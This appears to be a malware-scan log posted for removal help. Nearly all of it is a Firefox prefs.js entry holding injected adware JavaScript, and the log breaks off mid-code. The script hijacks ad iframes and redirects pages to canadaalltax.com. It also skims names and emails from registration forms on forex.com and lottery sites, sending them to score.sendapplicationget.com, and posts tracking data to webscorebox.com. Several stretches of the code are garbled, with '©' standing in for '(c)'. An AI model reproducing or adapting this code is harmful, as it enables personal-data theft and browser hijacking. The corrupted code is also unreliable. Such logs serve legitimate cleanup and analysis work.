IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: ""
FF - prefs.js..extensions.9FDrVT.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1){return}}catch(e){};(function(){var stngs = {serverzy_domains:'ads.mangomediaads.com optimizedby.brealtime.com n66.adshostnet.com ad.z5x.net exchange.admailtiser.com ad.yieldmanager.com ad.adserverplus.com adservingstd.com servedby.adxplosions.com cdn.trkclk.net srv.aileronx.com servedby.adsplats.com ad.reachjunction.com ads.deliads.com srv1.statisticsreporting.com ads.ad-maven.com advs.adgorithms.com ad.adnetwork.net ads.incmd03.com ads.mediawhite.com Servedby.bigfineads.com ads.pubmatic.com ads.yahoo.com an.z5x.net ads.clovenetwork.com c5.zedo.com ib.adnxs.com ad.jumbaexchange.com tr.adsplats.com ads.sonobi.com fw.adsafeprotected.com ad.improvemedianetwork.com ads.networkhm.com media.glispa.com',attr_name:'s12403480529111048514',szy_domain:[\"centerfastjet.in\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12]],checkif:function(ifr){return (ifr.getAttribute('s12403480529111048514') || ifr.src.indexOf('=287609')>-1||ifr.src.indexOf('=458516')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};new function(){if(!document.getElementById(\"__zsc_once\")&&window.top===window.self){var n=document.createElement(\"div\");n.id=\"__zsc_once\";var p=document.getElementsByTagName(\"body\")[0];p&&p.appendChild(n);var d=this;d.version=\"0.0.2\";d.now=(new Date).getTime();d.prefix=\"jhjlijpomuhn\";d.setIframes=[];d.checkInterval=1E3;d.programCount=0;d.iframesFound=!1;d.programStarted=!1;d.watchStarted=!1;d.initProgramCounter=0;d.conf={nrnm:5,usedIframes:[],src:[],counter:0,jbs:{ifr:[],at:[]},imp:{pid:\"_zigTop\",eid:\"721\",hid:\"12403480529111048514\",lt:\"1.83\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"ty6hl_At\",rattr:stngs.attr_name,title:document.title,domain:[\"sitewebred.com\",\"gadgetproffi.com\"],sizes:stngs.ad_sizes}};d.conf.params={subid:d.conf.imp.pid,subid1:d.conf.imp.hid,subid2:d.conf.imp.eid,lt:d.conf.imp.lt};d.utils=new function(){var c=this;c.get_computed_style=\"function\"!=typeof window.getComputedStyle?\nfunction(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle?a.currentStyle:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.getDimensions=function(){var a=0,b=0;\"number\"==typeof window.innerWidth?(b=window.innerHeight,a=window.innerWidth):document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)?\n(b=document.documentElement.clientHeight,a=document.documentElement.clientWidth):document.body&&(document.body.clientWidth||document.body.clientHeight)&&(b=document.body.clientHeight,a=document.body.clientWidth);return[a,b]};c.replaceIframe=function(a,b){try{if(a&&\"IFRAME\"==a.nodeName){var c=a.cloneNode(!1);a.parentNode.replaceChild(c,a);c.src=b;return c}}catch(d){}};c.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};c.l=new function(){this.xlat=\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\";\nthis.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var b=\"\",c=0;c<a.length;){var d=this.xlat.indexOf(a.charAt(c++)),e=this.xlat.indexOf(a.charAt(c++)),h=this.xlat.indexOf(a.charAt(c++)),k=this.xlat.indexOf(a.charAt(c++)),m=(e&15)<<4|h>>2,l=(h&3)<<6|k,b=b+String.fromCharCode(d<<2|e>>4);64!=h&&0<m&&(b+=String.fromCharCode(m));64!=k&&0<l&&(b+=String.fromCharCode(l))}return this._utf8_decode(b)};this._utf8_decode=function(a){for(var b=\"\",c=0;c<a.length;){var d=a.charCodeAt©;\nif(128>d)b+=String.fromCharCode(d),c++;else if(191<d&&224>d)var e=a.charCodeAt(c+1),b=b+String.fromCharCode((d&31)<<6|e&63),c=c+2;else var e=a.charCodeAt(c+1),h=a.charCodeAt(c+2),b=b+String.fromCharCode((d&15)<<12|(e&63)<<6|h&63),c=c+3}return b}};c.cookie=new function(){var a=this;a.createCookie=function(a,c,d){if(d){var e=new Date;e.setTime(e.getTime()+864E5*d);d=\"; expires=\"+e.toGMTString()}else d=\"\";document.cookie=a+\"=\"+c+d+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),\nd=0;d<c.length;d++){for(var e=c[d];\" \"==e.charAt(0);)e=e.substring(1,e.length);if(0==e.indexOf(a))return e.substring(a.length,e.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};c.ajax={get:function(a,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&b(c.ajax.xhr.responseText)},this.xhr.send()}catch(d){}},post:function(a,b,d){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",a,!0);this.xhr.setRequestHeader(\"Content-type\",\n\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&d(c.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};c.waitForTokens={};c.addScript=function(a){var b=document.createElement(\"script\");b.src=a;b.type=\"text/javascript\";b.id=d.prefix+\"_script\";try{(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(b)}catch©{}};c.waitForElement=function(a,b,g,f){var e=c.query_selector_all(a);clearTimeout(c.waitTimeout);\nif(25<d.waitForElementCounter)return b(null);if(\"undefined\"==typeof e||1>e.length){if(c.waitForTokens[f])return b(null);var h=arguments.callee;c.waitTimeout=setTimeout(function(){d.waitForElementCounter++;h(a,b,g,f)},g)}else{if(c.waitForTokens[f])return b(null);c.waitForTokens[f]=!0;d.waitForElementCounter=0;return b(e)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?\nfunction(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle?a.currentStyle:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||\nvoid 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};c.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,c;for(c in a)b[c]=\narguments.callee(a[c]);return b}return a};c.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,c,d){return d.toUpperCase()})};c.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return new RegExp(a)};c.throttle=function(a,b){var c=null;return function(){var d=this,e=arguments;clearTimeout©;c=setTimeout(function(){a.apply(d,e)},b)}};c.epoch=function(){return(new Date).getTime()};c.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||\n[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();c.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};c.match_url=function(a,b){for(var d=0;d<b.length;d++)if(\"string\"==typeof b[d]){var f;f=/^\\/.+\\/$/.test(b[d])?new RegExp(b[d]):c.wildcard_to_regex(b[d]);if(f instanceof RegExp&&f.test(a))return!0}}};d.gatherIframes=function(){return document.getElementsByTagName(\"iframe\")};\nd.setPreparedIframesArr=function(){var c=document.getElementsByTagName(\"iframe\"),a=[];if(c.length){for(var b=0;b<c.length;b++){var d=c;stngs.checkif(d)||a.push(d)}return a}};d.url=new function(){var c=this;c.getIframesSizes=function(){for(var a=[],b=0;b<d.conf.jbs.ifr.length;b++)d.conf.jbs.ifr.getAttribute(\"replaced\")||a.push(d.conf.jbs.at);return a.join(\",\")};c.prepareKV=function(){var a=\"?tid=1&\",b;for(b in d.conf.params)a+=b+\"=\"+d.conf.params+\"&\";a+=\"k=\"+encodeURIComponent(c.getKeywords())+\n\"&\";return a+=\"size=\"+c.getIframesSizes()};c.getKeywords=function(){var a=d.conf.imp.title,b=document.getElementsByTagName(\"meta\");if(b)for(var c=0,f=b.length;c<f;c++)\"keywords\"!=b[c].name.toLowerCase()&&\"description\"!=b[c].name.toLowerCase()||(a+=\" \"+b[c].content.replace(/,/g,\" \"));if(c=document.getElementsByTagName(\"a\")){b={};for(f=0;f<c.length;f++)try{var e=c[f].innerText;\"undefined\"==typeof e&&(e=c[f].textContent);for(var h=e.toLowerCase().split(/[\\s,-]/g),k=0;k<h.length;k++)4>h[k].length||(b[h[k]]?\nb[h[k]]++:b[h[k]]=1)}catch(m){}var e=[],l;for(l in b)e.push([l,b[l]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(l=0;l<e.length;l++)a+=\" \"+e[l][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)};c.prepareUrl=function(){var a=\"//\"+d.conf.imp.domain[\"https:\"==window.self.location.protocol?1:0],b=c.prepareKV();return a+b}};d.handleIframe=new function(){var c=this;c.initHandleIframes=function(a){a=c.getIframeDimensions(a);return c.mapDimensionsSizeArr(a)};c.getIframeDimensions=function(a){var b;\ntry{b=parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/))?a.width:a.scrollWidth}catch©{}a=parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/))?a.height:a.scrollHeight;return[parseInt(b),parseInt(a)]};c.mapDimensionsSizeArr=function(a){var b=d.conf.imp.sizes,c=a[0];a=a[1];for(var f=0;f<b.length;f++)if(c>=b[f][0]-5&&c<=b[f][0]+5&&a>=b[f][1]-5&&a<=b[f][1]+5)return b[f][2];return!1};c.destruct=function(){c.conf.jbs={ifr:[],at:[]}}};\nd.protectIframes=new function(){var c=this;c.protectionTimer=c.now;c.checkForException=function(a){return a.nextSibling&&a.nextSibling.innerHTML?/<span.+>Ads( not)? by/.test(a.nextSibling.innerHTML):!1};c.scanForNewAdIframes=function(){var a=[],b=document.getElementsByTagName(\"iframe\");if(b){for(var c=0;c<b.length;c++){var f=b[c],e=parseInt(f.width),h=parseInt(f.height);e&&h||(h=d.utils.get_computed_style(f),e=parseInt(h.getPropertyValue(\"width\")),h=parseInt(h.getPropertyValue(\"height\")));if(e&&h&&\n!(110>e))for(var k=0;k<stngs.ad_sizes.length;k++){var m=stngs.ad_sizes[k];e!==m[0]||h!==m[1]||f.getAttribute(\"replaced\")||a.push(f)}}return a}};c.scanAndSetFrames=function(){clearTimeout(c.stimeout);if(0!==d.setIframes.length)for(var a=0;a<d.setIframes.length;a++){var b=d.setIframes[a][0],g=d.setIframes[a][1][0];if(g&&b.src!==g){if(c.checkForException(b))return;g.match(/^data/)?d.setIframes[a][0]=d.utils.replaceIframe(b,g):b.src=g}}a=c.scanForNewAdIframes();if(0<a.length)return d.preparedIframes=\na,d.conf.jbs.ifr=[],d.conf.jbs.at=[],d.prepareUrl(0,function(a){d.getAds(a,\"setFrames\")});c.stimeout=setTimeout(function(){d.watchStarted=!0;c.scanAndSetFrames()},d.checkInterval)};c.start=function(){c.scanAndSetFrames()}};d.getAds=function(c,a){d.utils.msie?(c=c+\"&cb=\"+d.prefix+\".\"+a,d.utils.addScript©):D.utils.ajax.get(c,d[a])};d.restartProgram=function(){d.programCount++;40<d.programCount||d.watchStarted||setTimeout(d.initProgram,500)};d.prepareUrl=function(c,a){d.preparedIframes&&0!==d.preparedIframes.length||\nd.restartProgram();for(var b=0;b<d.preparedIframes.length;b++){var g=d.preparedIframes,f=d.handleIframe.initHandleIframes(g);f&&(g.setAttribute(d.conf.imp.rattr,\"true\"),d.conf.jbs.ifr.push(g),d.conf.jbs.at.push(f))}if(0===d.conf.jbs.ifr.length)return d.restartProgram();b=d.url.prepareUrl();a(b)};d.checkIfIframIsAd=function(c,a){for(var b=0;b<stngs.ad_sizes.length;b++){var d=stngs.ad_sizes;if(c>=d[0]-25&&c<=d[0]+25&&a>=d[1]-25&&a<=d[1]+25||100>c)return!0}return!1};d.checkIframeWidthHeight=function©{if(!c)return!1;\nfor(var a=0;a<c.length;a++){var b=c[a],d=parseInt(b.width);parseInt(b.height);for(b=0;b<stngs.ad_sizes.length;b++)if(d===stngs.ad_sizes[0])return!0}return!1};d.initProgram=function(){d.preparedIframes=d.setPreparedIframesArr();if(!d.preparedIframes)return d.restartProgram();d.programStarted=!0;d.prepareUrl(0,function©{0!==d.conf.jbs.ifr.length&&d.getAds(c,\"setFrames\")})};d.handleResponse=new function(){var c=this;c.iframeCounter=0;c.decodeResponse=function(a){try{var b=d.utils.l.decode(a);a=\n\"undefined\"!=typeof JSON&&JSON.parse?JSON.parse(b):eval(\"response = \"+b)}catch©{}return a};c.getAdUrl=function(a,b){return-1<a[0].indexOf(\"?\")?a[0]+\"&\"+d.conf.imp.jpshort+\"=\"+a[2]+\"_18x18_0\":\"\"};c.blockReferrer=function(a,b,g,f){g=c.getAdUrl(a,g);if(d.utils.msie){c.iframeCounter++;try{if(b&&\"IFRAME\"==b.nodeName){var e=b.cloneNode(!1);e.setAttribute(\"name\",\"adzy653rk\"+c.iframeCounter);e.setAttribute(\"frameboarder\",\"0\");b.parentNode.replaceChild(e,b);window.open(g,e.name);a[0]=g;return e}}catch(h){}}else try{e=\n'data:text/html;,<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body><iframe width=\"100%\" height=\"100%\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" src=\"'+g+'\"></iframe></body></html>',b.src=e,a[0]=e}catch(k){}};c.defaultReferer=function(a,b,d){b.src=c.getAdUrl(a,d)};c.setIframeSrc=function(a,b,g,f){switch(g){case 1:g=c.blockReferrer(b,a,g,f);\"undefined\"!==typeof g&&(a=g);break;default:c.defaultReferer(b,\na,g),b[0]=c.getAdUrl(b,g)}d.setIframes.push([a,b]);a.setAttribute(\"replaced\",\"true\")}};d.setFrames=function©{if((c=d.handleResponse.decodeResponse©)&&0<c.length)for(var a=0;a<c.length;a++){var b=c[a];b?d.handleResponse.setIframeSrc(d.conf.jbs.ifr[a],b,b[3],a):(b=d.conf.jbs.ifr[a],b.setAttribute(\"replaced\",\"true\"),d.setIframes.push([b,!1]))}d.protectIframes.start()};window.top==window.self&&d.initProgram();\"undefined\"==typeof window[d.prefix]&&(window[d.prefix]=d)}};\n})();(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax....48514&pid=0&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rTa8vTsEqS5FpdgKrTVXrjnEqdk6qjU6qa%3D%3D&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rTa8vTsEqS5FpdgKrTVXrjnEqdk6qjU6qa%3D%3D&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rTa8vTsEqS5FpdgKrTVXrjnEqdk6qjU6qa%3D%3D&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=rTa8vTsEqS5FpdgKrTVXrjnEqdk6qjU6qa%3D%3D&eid=721&hid=12403480529111048514&pid=0&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\.@]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"ty6hl_At=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"ty6hl_At=\")){var d=a.match(/ty6hl_At=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8dnihVWzmPhd96rTwMCyVUojaMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rjs9rdr9pda8rTUFrjwEqdY8rjn=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var 